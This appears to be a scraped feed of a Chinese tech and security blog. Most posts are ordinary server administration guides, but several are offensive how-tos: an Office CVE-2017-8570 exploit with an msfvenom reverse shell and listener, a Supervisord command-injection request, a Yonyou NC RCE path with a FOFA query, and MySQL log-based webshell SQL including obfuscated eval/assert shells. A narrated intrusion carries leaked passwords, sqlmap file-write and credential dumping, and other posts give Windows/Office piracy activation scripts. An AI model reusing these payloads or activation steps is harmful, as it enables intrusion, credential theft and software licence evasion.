Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

浏览器设置UA的插件

User-Agent Switcher

使用方法
图 0

添加自定义UA方法
图 1

非法网站正常访问无法打开
图 2

但是在非法信息里面可以看到是存在具体的非法信息的
图 3

这里我们可以通过APT来抓包，来进行分析, 添加一个抓包任务，注意文件大小，ip和端口
图 4
图 5

过10分钟以后下载抓的包，然后使用wireshark打开
图 6

查看对应的tcp流，右键，追踪流-tcp流
图 7

在这里看到当使用了google蜘蛛UA以后，是有响应内容的，可以确定是通过GoogleUA来进行黑链SEO 本地测试
图 8
图 9

]]> security 傲盾明御黑SEO powershell命令查看修改远程桌面端口 /archives/windows/use-powershell-modify-rdp-port.html

查看当前 RDP 的端口

Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name PortNumber

修改 RDP 的端口，比如这里修改为3390

# 修改 RDP 端口为 3390
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name PortNumber -Value 3390

# 重新启动 RDP 服务以使更改生效
Restart-Service -Name TermService -Force

更新防火墙规则放行 3390

# 例如，允许 3390 端口通过防火墙
New-NetFirewallRule -DisplayName "Allow RDP 3390" -Profile 'Public' -Direction Inbound -Protocol TCP -LocalPort 3390 -Action Allow

]]> windows powershell rdp端口 CVE-2017-8570-Office命令执行 /archives/security/cve-2017-8570.html 2017-8570漏洞影响范围

Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2013 RT Service Pack 1
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)

ichunqiu实验环境，需要登陆

Office远程代码执行漏洞_网络安全在线实验_i春秋 (ichunqiu.com)

1.生成ppsx文件

cd  CVE-2017-8570       //进入exploit的目录
python cve-2017-8570_toolkit.py  -M gen -w Invoice.ppsx -u http://172.16.12.2/logo.doc       //生成ppsx恶意文件

2.生成反弹文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 -f exe > /tmp/shell.exe

3.监听端口

python cve-2017-8570_toolkit.py -M exp -e http://172.16.12.2/shell.exe -l /tmp/shell.exe

4.msf本地监听反弹

msfconsole
use multi/handler   //使用监听模块
set payload windows/meterpreter/reverse_tcp    //设置Payload
set LHOST 172.16.12.2   //设置本地接收IP
run

5.打开ppsx文件，获得shell，修复方案，

补丁地址 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570

]]> security cve-2017-8570 CVE-2017-11610-Supervisord命令执行 /archives/security/cve-2017-11610.html 实验环境和介绍

Supervisord 远程代码执行漏洞_视频教程_i春秋_培育信息时代的安全感！ (ichunqiu.com)

参考

https://blogs.securiteam.com/index.php/archives/3348
https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610

图 0

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

supervisor.supervisord.options.warnings.linecache.os.systemtouch /tmp/success

图 1

]]> security cve-2017-11610 supervisord 永久激活 windows /archives/windows/active-windows-script.html 这是个数字激活windows 的脚本，方便快捷，

运行——命令提示符——输入slmgr.vbs -xpr

可以查看激活状态

网站 https://github.com/massgravel/Microsoft-Activation-Scripts 下载，

解压密码1234

解压后，右键以管理员身份运行，然后输入 2

图 0

如果出现这个，可能是连接着vpn或者没有联网，需要保持网络通畅
图 1

退出VPN或者联网后重复上面操作，一般会成功激活，激活效果如图
图 2

此时Windows10 就已经永久激活了，可以通过命令 slmgr.vbs -xpr 进行查看
图 3

]]> windows 激活windows Office Pro2019专业增强版下载，安装，版本转换，激活 /archives/windows/office-pro-2019-active.html https://msdn.itellyou.cn/ 下载，office pro 2019 专业增强版 ED2k下载地址以上链接下载安装好以后打开运行看是否正常版本转换，把版本从零售版 Retail 版本转换为 VOL批量激活版，把下面的代码复制内容存为xxx.bat，cmd里面运行即可

:: 修复乱码问题
CHCP 65001
title office2019 retail转换vol版
:: 判断安装目录
if exist "%ProgramFiles%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles%\Microsoft Office\Office16"
if exist "%ProgramFiles(x86)%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles(x86)%\Microsoft Office\Office16"

cls

echo 正在重置Office2019零售激活...

cscript ospp.vbs /rearm

echo 正在安装 KMS 许可证...
for /f %%x in ('dir /b ..\root\Licenses16\ProPlus2019VL_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul

echo 正在安装 MAK 许可证...
for /f %%x in ('dir /b ..\root\Licenses16\ProPlus2019VL_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul

echo 正在安装 KMS 密钥...
cscript ospp.vbs /inpkey:NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP

echo 正在设置 KMS 服务器...
cscript ospp.vbs /sethst:kms.03k.org

echo 正在联系KMS服务器...
cscript ospp.vbs /act

echo 转化完成，按任意键退出！

pause >nul

exit

图 0

如果安装了其他key, 卸载已经安装的key，cscript ospp.vbs /unpkey:XXXXX 这里的xxxxx为5位字符，可以在上面这个命令里面看到，查看是否激活
激活后如下图
图 1

]]> windows office 2019 激活 Centos 使用国内源 /archives/linux/centos-modify-repo.html 1. 备份原有的 yum 源配置

在更改源之前，建议先备份现有的 yum 源配置文件，以防需要恢复：

sudo cp /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.bak

2. 更换为阿里云源

可以使用以下命令直接下载并替换为阿里云提供的 CentOS-Base.repo：

sudo wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo

或者，如果你使用的是 CentOS 8：

sudo wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-8.repo

3. 更换为清华源

同样，可以使用以下命令直接下载并替换为清华大学提供的 CentOS-Base.repo：

对于 CentOS 7：

sudo wget -O /etc/yum.repos.d/CentOS-Base.repo https://mirrors.tuna.tsinghua.edu.cn/repo/Centos-7.repo

对于 CentOS 8：

sudo wget -O /etc/yum.repos.d/CentOS-Base.repo https://mirrors.tuna.tsinghua.edu.cn/repo/Centos-8.repo

4. 清理缓存并更新源

下载并替换了新的 .repo 文件后，执行以下命令来清理 yum 缓存并更新：

sudo yum clean all
sudo yum makecache

5. 验证源是否更换成功

最后，运行以下命令以确认新的源配置已经生效，并且可以正常使用：

sudo yum repolist

如果命令输出中显示了来自阿里云或清华大学镜像站点的源列表，说明源更换成功。

总结

通过上述步骤，你可以将 CentOS 的默认软件源更换为国内的阿里云源或清华源，以提高软件包下载的速度。这对于在国内使用 CentOS 服务器非常有帮助。

]]> 云服务器+宝塔+v2ray+ssl /archives/web/ecs-bt-v2ray-ssl.html 步骤：

购买云服务器，阿里云，腾讯，谷歌
系统可以是debian
升级系统
sudo apt clean all
sudo apt update

安装宝塔
相关命令可以参考宝塔linux命令大全

url=https://download.bt.cn/install/install_lts.sh;if [ -f /usr/bin/curl ];then curl -sSO $url;else wget -O install_lts.sh $url;fi;bash install_lts.sh

安装nginx，php，mysql，用于网站正常使用，如果不需要可以只安装nginx
申请域名并解析到云服务器
添加网站，填入域名并提交

添加SSL
一种方法是自己申请SSL 证书，另外一种是使用宝塔自动申请SSL证书,方法很简单，下面只介绍第一种，
自己申请并下载证书，选择nginx服务器证书，
添加证书，下载的证书有后缀为.key 和.pem 的文件，分别填入ssl证书的左右边

图 1

配置反向代理，可以根据自己情况设定

  location /xray 
{
    proxy_pass http://127.0.0.1:8443;#8443为xray里自己设定的端口
    proxy_redirect off;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Host $http_host;
    proxy_read_timeout 300s;
}

图 2
图 3

安装V2ray

bash <(curl -L https://raw.githubusercontent.com/v2fly/fhs-install-v2ray/master/install-release.sh)

获取UUID，并保存好这串值，
cat /proc/sys/kernel/random/uuid

配置v2ray配置文件

路径/usr/local/etc/v2ray/config.json，加入如下内容，根据自己实际情况修改下，有三个地方需要修改，记得删除红字

{
  "policy": {
    "levels": {
      "0": {
        "uplinkOnly": 0,
        "downlinkOnly": 0,
        "connIdle": 150,
        "handshake": 4
      }
    }
  },
  "inbound": {
    "listen": "127.0.0.1",
    "port": 8443,这里是v2ray监听端口，可以自己设置，但要和宝塔里的一致
    "protocol": "vmess",
    "settings": {
      "clients": [
        {
          "id": "这里填入上面获取的UUID的值",
          "level": 1,
          "alterId": 32
        }
      ]
    },
    "streamSettings": {
      "network": "ws",
      "security": "auto",
      "wsSettings": {
        "path": "/xray",
        "headers": {
          "Host": "这里改成添加的域名，例如www.xxx.com"
        }
      }
    }
  },
  "outbound": {
    "protocol": "freedom",
    "settings": { }
  },
  "outboundDetour": [
    {
      "protocol": "blackhole",
      "settings": { },
      "tag": "blocked"
    }
  ],
  "routing": {
    "strategy": "rules",
    "settings": {
      "rules": [
        {
          "type": "field",
          "ip": [
            "0.0.0.0/8",
            "10.0.0.0/8",
            "100.64.0.0/10",
            "127.0.0.0/8",
            "169.254.0.0/16",
            "172.16.0.0/12",
            "192.0.0.0/24",
            "192.0.2.0/24",
            "192.168.0.0/16",
            "198.18.0.0/15",
            "198.51.100.0/24",
            "203.0.113.0/24",
            "::1/128",
            "fc00::/7",
            "fe80::/10"
          ],
          "outboundTag": "blocked"
        }
      ]
    }
  }
}

启动v2ray

systemctl start v2ray.service

其他命令，分别为，开机启动v2ray，重启v2ray,停止v2ray

systemctl enable v2ray.service
systemctl restart v2ray.service
systemctl stop v2ray.service

查看v2ray运行端口是否正常
netstat -anp | grep 端口号

至此，服务器上面的配置已经完成，

电脑上面配置和使用v2ray

下载V2rayN
https://www.github.com/2dust/v2rayN/releases
配置，如图，或者按自己实际情况填写
如果配置一切正常，那么一个新的人字梯就做好了
现在PC上面默认的代理端口为Socks5 10808，http 10809;

使用梯子，

全局使用
右键V2ray图标，系统代理——>自动配置系统代理
这样选择以后，系统所有流量都将使用代理
浏览器使用
firefox或者chrome，安装Proxy SwitchyOmega插件，并配置即可，

图 5

]]> web v2ray 使用growpart对磁盘进行热扩容 /archives/linux/growpart-hot-expand.html

确保 growpart 工具已安装

首先，确认系统中已经安装了 growpart 工具。growpart 是 cloud-utils-growpart 包的一部分，可以通过以下命令进行安装：

centos系统

sudo yum install cloud-utils-growpart -y

debian系统

sudo apt install cloud-guest-utils -y

2. 查看当前分区情况

在进行扩容前，建议查看当前磁盘的分区情况。使用 lsblk 或 fdisk 命令查看磁盘分区信息：

lsblk

或者

sudo fdisk -l

3. 使用 `growpart` 扩展分区

假设你要扩展的磁盘是 /dev/sda，并且要扩展的分区是第 1 个分区（/dev/sda1），可以使用以下命令来扩展该分区：

sudo growpart /dev/sda 1

这里的 /dev/sda 是磁盘名称，1 是分区号。

4. 扩展文件系统

扩展分区后，还需要扩展文件系统，以便操作系统可以使用新增的磁盘空间。扩展文件系统的命令取决于使用的文件系统类型。

对于 ext4 文件系统：
sudo resize2fs /dev/sda1
对于 xfs 文件系统：
sudo xfs_growfs /dev/sda1

5. 验证扩容

最后，再次使用 lsblk 或 df -h 来确认分区和文件系统已经成功扩展。

df -h

注意事项

确保在进行这些操作之前，已经备份了重要数据。
磁盘和分区的扩展操作存在一定风险，特别是在生产环境中操作时，请小心执行。

]]> linux growpart 磁盘热扩容 Centos 更改密码 /archives/linux/centos-reset-password.html 在 CentOS 中重置密码通常需要进入单用户模式（Single User Mode）或者救援模式（Rescue Mode）。以下是如何在 CentOS 7 或 CentOS 8 中重置密码的步骤：

1. 重新启动系统

重启计算机后，在启动时按下键盘上的 ESC 键进入 GRUB 菜单（如果没有看到 GRUB 菜单，可以尝试按 Shift 键）。

2. 进入 GRUB 菜单

在 GRUB 菜单中，用上下箭头选择你当前的操作系统条目，然后按 e 键编辑该条目。

3. 编辑启动项

找到以 linux16 或 linux 开头的那一行，使用箭头键移动光标到这一行的末尾。
在这一行的末尾，输入 rd.break，然后按下 Ctrl + X 或 Ctrl + Alt + F2 以启动系统。

4. 进入紧急模式

系统将进入一个名为 emergency 的模式，此时根文件系统挂载为只读。

5. 重新挂载根文件系统为可读写

输入以下命令将根文件系统重新挂载为读写模式：

mount -o remount,rw /sysroot

6. 访问系统环境

切换到系统的根环境：

chroot /sysroot

7. 重置密码

使用 passwd 命令重置 root 用户的密码：

passwd

然后输入新密码。

8. 重新标记所有文件

为了确保系统可以正常启动，运行以下命令：

touch /.autorelabel

9. 退出并重新启动系统

输入以下命令退出 chroot 环境：

exit
exit

系统会重新启动，完成 SELinux 的 relabeling 后，系统将正常启动。

此时，你可以使用新设置的 root 密码登录系统。

注意

如果系统有加密的磁盘或分区，你可能需要在重启时提供相应的密码。
使用此方法重置密码时，请确保只有有权限的人员能够访问你的服务器

]]> linux centos 重置系统密码用友NC BeanShell远程代码执行 /archives/security/cnvd-2021-30167.html 1.影响版本

NC6.5版本

2.漏洞复现

FOFA语句：

icon_hash="1085941792"

3.执行命令

PoC:

/servlet/~ic/bsh.servlet.BshServlet

图 0

图 1

]]> security CNVD-2021-30167 用友NC diagnostic policy service启动不了怎么办 /archives/windows/diagnostic-policy-service-cannot-start.html diagnostic policy service启动不了怎么办

解决方法如下：

方法一：
确认Diagnostic Service Host、Group Policy Client这两个服务都一打开，然后即可打开Diagnostic Policy Service
方法二：打开 diagnostic policy service 的属性。
若要指定服务可以用来登录的用户帐户，请单击“登录”选项卡，然后执行下列操作之一：
1、若要指定服务使用本地系统帐户，请单击“本地系统帐户”。
2、若要指定服务使用本地服务帐户，请单击“此帐户”，然后键入NT AUTHORITY\LocalService。
3、要指定服务使用网络服务帐户，请单击“此帐户”，然后键入 NT AUTHORITY\NetworkService。
4、若要指定其他帐户，请依次单击“此帐户”、“浏览”，然后在“选择用户”对话框中指定用户帐户。完成操作后，请单击“确定”。
在“密码”和“确认密码”中键入该用户帐户的密码，然后单击“确定”。如果您选择本地服务帐户或网络服务帐户，则不要键入密码。
方法三：重置服务权限
有时服务的权限设置不正确也会导致服务启动失败。你可以尝试重置服务权限：
打开命令提示符（以管理员身份）。
输入以下命令来重置“诊断策略服务”的权限：
sc sdset DPS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)
重启计算机后尝试再次启动服务

]]> ssh 连接等待 /archives/linux/ssh-usedns.html ssh的连接远程linux主机的时候会有几秒的等待，但是网络没有问题，因为ssh配置文件里面的UseDns 未配置，

修改/etc/ssh/sshd_config 里面的

#UseDns yes

修改为

UseDns no

重启ssh服务器即可

service sshd reload

]]> linux ssh连接慢常见网站爬虫 User Agent /archives/web/spider-agent.html 百度移动UA:

Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,likeGecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)

百度PC UA:

Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html）

百度移动渲染UA：

Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 likeMac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)

百度PC 渲染UA：

Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)

谷歌蜘蛛Googlebot

Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Google图片搜索

Googlebot-Image/1.0

必应蜘蛛bingbot

Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)

雅虎蜘蛛Yahoo
雅虎英文

Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)

雅虎中国

Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)

搜狗蜘蛛Sogou News Spider

Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)

搜狗图片

http://pic.sogou.com Sogou Pic Spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm#07)

360蜘蛛 360Spider

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0);

360网站安全检测

360spider (http://webscan.360.cn)

MSN蜘蛛msnbot-media

*msnbot/1.0 (+http://search.msn.com/msnbot.htm”)

有道蜘蛛YoudaoBot

Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/;)

宜搜蜘蛛EasouSpider

Mozilla/5.0 (compatible; EasouSpider; +http://www.easou.com/search/spider.html)

七牛

qiniu-imgstg-spider-1.0

]]> web 百度蜘蛛 User Agent 由于没有远程桌面授权服务器可以提供许可证，远程会话被中断 /archives/other/rdp-disconnect-120day-is-end.html 问题是因为微软默认的远程登录只提供120天的使用期限。解决该问题的具体步骤如下：

打开运行,输入“regedit”，
在注册表对话框中依次打开

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\RCM\GracePeriod

右键点击“GracePeriod”，在菜单中点击“权限”
修改“GracePeriod”的权限，administrator勾选完全控制
右键点击“GracePeriod”，在菜单中点击“删除”
重启服务器

]]> waiting (TTFB) 时间过长 /archives/web/waiting-ttfb.html 网页的响应时间慢，尤其是高 TTFB（Time to First Byte，首字节时间）通常由多种因素导致。这里有一些可能的原因及对应的解决方法：

1. 服务器处理时间

如果服务器处理请求需要较长时间，这可能是由后端程序效率低下或资源受限造成的。

解决方法：

优化代码 ：审查和优化后端代码，包括数据库查询、API调用等。
增强服务器性能 ：增加服务器的CPU和内存资源，或升级服务器硬件。
使用缓存 ：对静态内容使用 CDN（内容分发网络），对数据库查询结果或页面使用缓存。

2. 数据库性能问题

数据库查询效率低下也会导致TTFB增高。

解决方法：

优化查询 ：优化SQL查询，使用索引，减少数据的冗余和扫描量。
数据库服务器优化 ：调整数据库配置，增加内存和处理能力。

3. 网络延迟

如果服务器与用户地理位置距离较远或网络环境不佳，也会影响加载时间。

解决方法：

使用CDN ：部署CDN来减少地理距离带来的延迟。
优化网络设置 ：检查并优化你的网络配置和带宽。

4. 服务器配置

服务器配置不当也可能增加响应时间。

解决方法：

查看并优化服务器配置 ：检查Web服务器和数据库服务器的配置。
启用HTTP/2 ：如果可能，启用HTTP/2可以显著提高数据传输效率。

5. 第三方服务

如果你的网页依赖于第三方服务（如API或外部数据库），这些服务的延迟也会影响TTFB。

解决方法：

监控第三方服务性能 ：确定哪些第三方服务影响了性能，并考虑找寻替代方案或优化调用方式。
异步加载 ：对于非关键的第三方资源，可以考虑异步加载。

6. HTTPS 握手延迟

使用HTTPS的TLS握手可能增加连接建立的时间。

解决方法：

TLS 1.3 ：使用支持TLS 1.3的服务器和客户端可以减少握手时间。
减少重定向 ：减少需要多次HTTPS握手的重定向。

通过逐步诊断和实施这些策略，可以有效地减少TTFB，从而提升网站的整体性能和用户体验。如果你需要更具体的指导或分析，请提供更多的背景信息，如服务器类型、使用的技术栈等细节

]]> web TTFB 响应慢 Windows 通过 xrdp 连接 Linux /archives/tools/use-xrdp-connect-linux.html Kali上面依次安装

apt install tightvncserver
apt install xrdp

开启防火墙

ufw allow 3389/tcp

开启服务

service xrdp start

无法连接可以查看错误日志

/root/.xorgxrdp.10.log
/root/.xsession-errors
/var/log/xorg.log
/var/log/xrdp-sesman.log
/var/log/massessge

]]> tools xrdp 宝塔命令大全 /archives/tools/bt-command-detail.html 宝塔linux面板命令大全 - 宝塔面板 (bt.cn)

安装宝塔

Centos安装脚本

yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh

Ubuntu/Deepin安装脚本

wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh

Debian安装脚本

wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh

Fedora安装脚本

wget -O install.sh http://download.bt.cn/install/install_6.0.sh && bash install.sh

管理宝塔

宝塔工具箱(包含下列绝大部分功能直接ssh中执行bt命令仅限6.x以上版本面板)

bt

停止

/etc/init.d/bt stop

启动

/etc/init.d/bt start

重启

/etc/init.d/bt restart

卸载

/etc/init.d/bt stop && chkconfig --del bt && rm -f /etc/init.d/bt && rm -rf /www/server/panel

查看当前面板端口

cat /www/server/panel/data/port.pl

修改面板端口，如要改成8881（centos 6 系统）

echo '8881' > /www/server/panel/data/port.pl && /etc/init.d/bt restart
iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport 8881 -j ACCEPT
service iptables save
service iptables restart

修改面板端口，如要改成8881（centos 7 系统）

echo '8881' > /www/server/panel/data/port.pl && /etc/init.d/bt restart
firewall-cmd --permanent --zone=public --add-port=8881/tcp
firewall-cmd --reload

强制修改MySQL管理(root)密码，如要改成123456

cd /www/server/panel && python tools.py root 123456

修改面板密码，如要改成123456

cd /www/server/panel && python tools.py panel 123456

查看宝塔日志

cat /tmp/panelBoot.pl

查看软件安装日志

cat /tmp/panelExec.log

站点配置文件位置

/www/server/panel/vhost

删除域名绑定面板

rm -f /www/server/panel/data/domain.conf

清理登陆限制

rm -f /www/server/panel/data/*.login

查看面板授权IP

cat /www/server/panel/data/limitip.conf

关闭访问限制

rm -f /www/server/panel/data/limitip.conf

查看许可域名

cat /www/server/panel/data/domain.conf

关闭面板SSL

rm -f /www/server/panel/data/ssl.pl && /etc/init.d/bt restart

查看面板错误日志

cat /tmp/panelBoot

查看数据库错误日志

cat /www/server/data/*.err

站点配置文件目录(nginx)

/www/server/panel/vhost/nginx

站点配置文件目录(apache)

/www/server/panel/vhost/apache

站点默认目录

/www/wwwroot

数据库备份目录

/www/backup/database

站点备份目录

/www/backup/site

站点日志

/www/wwwlogs

Nginx服务管理

nginx安装目录

/www/server/nginx

启动

/etc/init.d/nginx start

停止

/etc/init.d/nginx stop

重启

/etc/init.d/nginx restart

启载

/etc/init.d/nginx reload

nginx配置文件

/www/server/nginx/conf/nginx.conf

Apache服务管理

apache安装目录

/www/server/httpd

启动

/etc/init.d/httpd start

停止

/etc/init.d/httpd stop

重启

/etc/init.d/httpd restart

启载

/etc/init.d/httpd reload

apache配置文件

/www/server/apache/conf/httpd.conf

MySQL服务管理

mysql安装目录

/www/server/mysql

phpmyadmin安装目录

/www/server/phpmyadmin

数据存储目录

/www/server/data

启动

/etc/init.d/mysqld start

停止

/etc/init.d/mysqld stop

重启

/etc/init.d/mysqld restart

启载

/etc/init.d/mysqld reload

mysql配置文件

/etc/my.cnf

FTP服务管理

ftp安装目录

/www/server/pure-ftpd

启动

/etc/init.d/pure-ftpd start

停止

/etc/init.d/pure-ftpd stop

重启

/etc/init.d/pure-ftpd restart

ftp配置文件

/www/server/pure-ftpd/etc/pure-ftpd.conf

PHP服务管理

php安装目录

/www/server/php

启动(请根据安装PHP版本号做更改，例如：/etc/init.d/php-fpm-54 start)

/etc/init.d/php-fpm-{52|53|54|55|56|70|71|72|73|74} start

停止(请根据安装PHP版本号做更改，例如：/etc/init.d/php-fpm-54 stop)

/etc/init.d/php-fpm-{52|53|54|55|56|70|71|72|73|74} stop

重启(请根据安装PHP版本号做更改，例如：/etc/init.d/php-fpm-54 restart)

/etc/init.d/php-fpm-{52|53|54|55|56|70|71|72|73|74} restart

启载(请根据安装PHP版本号做更改，例如：/etc/init.d/php-fpm-54 reload)

/etc/init.d/php-fpm-{52|53|54|55|56|70|71|72|73|74} reload

配置文件(请根据安装PHP版本号做更改，例如：/www/server/php/52/etc/php.ini)

/www/server/php/{52|53|54|55|56|70|71|72|73|74}/etc/php.ini

Redis服务管理

redis安装目录

/www/server/redis

启动

/etc/init.d/redis start

停止

/etc/init.d/redis stop

redis配置文件

/www/server/redis/redis.conf

Memcached服务管理

memcached安装目录

/usr/local/memcached

启动

/etc/init.d/memcached start

停止

/etc/init.d/memcached stop

重启

/etc/init.d/memcached restart

启载

/etc/init.d/memcached reload

]]> tools 宝塔宝塔命令手机修改hosts文件 /archives/security/modify-phone-hosts.html 手机hosts文件位于/system/etc/hosts 直接修改会提示只读文件系统，即使获得root权限。

方法:

刷过twrp的，重启进入”恢复模式”，”挂载” 勾选system，返回后进入 “高级”，里面有命令，因为没有vi之类的，所以直接echo写内容到hosts

echo "127.0.0.1 hao.kim" >> /system/etc/hosts

内容这样就写入hosts，重启手机就可以按预期访问

]]> security 修改hosts mysql写入php一句话 /archives/security/random-pentest-4.html 漏洞

目录浏览，phpinfo，
phpmyadmin 写shell

目标存在phpmyadmin，又因为目录浏览，看到网站备份的压缩文件，下载以后查找数据库用户密码，找到

root：fhcloud_2018

登录phpmyadmin，

getshell

想通过写入文件获得webshell，但是查询到导出路径为NULL，遂想通过日志来getshell
通过慢查询日志getshell，开启慢查询日志记录，通过phpinfo提供路径，进行log查询写入

show variables like '%slow_query_log%';

图 1
开启慢查询日志记录

set GLOBAL slow_query_log=on;

通过phpinfo得知，web目录为C:\phpStudy\WWW\log.php，所以设置日志路径

set GLOBAL slow_query_log_file='C:\\phpStudy\\WWW\\log2.php';

图 2

基于日志写shell #
（ outfile被禁止，或者写入文件被拦截，没写权限，有root权限）

show variables like '%general%'; --查看配置，日志是否开启，和mysql默认log地址(记下原地址方便恢复)
set global general_log = on; --开启日志监测，默认关闭(如果一直开文件会很大的)
set global general_log_file = '/var/www/html/info.php'; --设置日志路径
select '<?php phpinfo();?>'; --执行查询，写入shell
--结束后，恢复日志路径，关闭日志监测

--SQL查询免杀shell
select "<?php $sl = create_function('', @$_REQUEST['klion']);$sl();?>";

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>";

---------------
--慢查询写shell
---------------
为什么要用慢查询写呢？上边说过开启日志监测后文件会很大，网站访问量大的话我们写的shell会出错
show variables like '%slow_query_log%'; --查看慢查询信息
set global slow_query_log=1;  --启用慢查询日志(默认禁用)
set global slow_query_log_file='C:\\phpStudy\\WWW\\shell.php'; --修改日志文件路径
select '<?php @eval($_POST[abc]);?>' or sleep(11);  --写shell

]]> security 目录浏览 mysql写一句话安全相关站点 /archives/security/security-web.html 名称地址狼组安全团队公开知识库https://wiki.wgpsec.org/knowledge/]]> security 安全知识站点安全讯息 VMware 因为系统更新启动提示没有GCC /archives/tools/vmware-not-found-gcc.html linux系统因为更新内核导致vmware提示找不到 gcc
如果系统有提示重新安装vmmon vmnet 点击重新安装即可

方法1

去https://github.com/mkubecek/vmware-host-modules找对应vm版本的tar.gz,然后安装

First method (build and install):

wget https://github.com/mkubecek/vmware-host-modules/archive/workstation-14.1.1.tar.gz
tar -xzf workstation-14.1.1.tar.gz
cd vmware-host-modules-workstation-14.1.1
make
make install

方法2

Second method (replace original tarballs):

wget https://github.com/mkubecek/vmware-host-modules/archive/workstation-14.1.1.tar.gz
tar -xzf workstation-14.1.1.tar.gz
cd vmware-host-modules-workstation-14.1.1
tar -cf vmmon.tar vmmon-only
tar -cf vmnet.tar vmnet-only
cp -v vmmon.tar vmnet.tar /usr/lib/vmware/modules/source/
vmware-modconfig --console --install-all

]]> tools gcc vmware 目录浏览致域沦陷 /archives/security/file-of-to-dc-fall.html 目录浏览引发的血案

漏洞

目录浏览
phpinfo.php
mysql密码泄漏
phpmyadmin

目录泄漏，到处查看文件，其中一个配置文件里面找到了一个mysql用户及密码

http://xxxx:8880/inc/func/mysql.inc

$conn_local=db_connect('localhost','nik','niknik','cugaet');

phpmyadmin 能登录，

http://xxxx:8880/phpmyadmin

登录以后发现为dba，i结合phpinfo泄漏的路径可以直接写shell，顺便查看root密码02061978

sqlmap -d mysql://nik:niknik@xxxx:3306/mysql --file-write=/root/webshell/shell.php  --file-dest=C:/xampp/htdocs/shell.php

菜刀链接以后开始信息收集

找到了mssql sa密码

C:/wamp/www/automatic_oop/gubo/load.php

xxxxx:1433 - Login Successful: WORKSTATION\sa:57835783

权限也比较高，

上传msf监听，getsystem，load-kiwi

导出密码

Username Domain Password


(null) (null) (null)
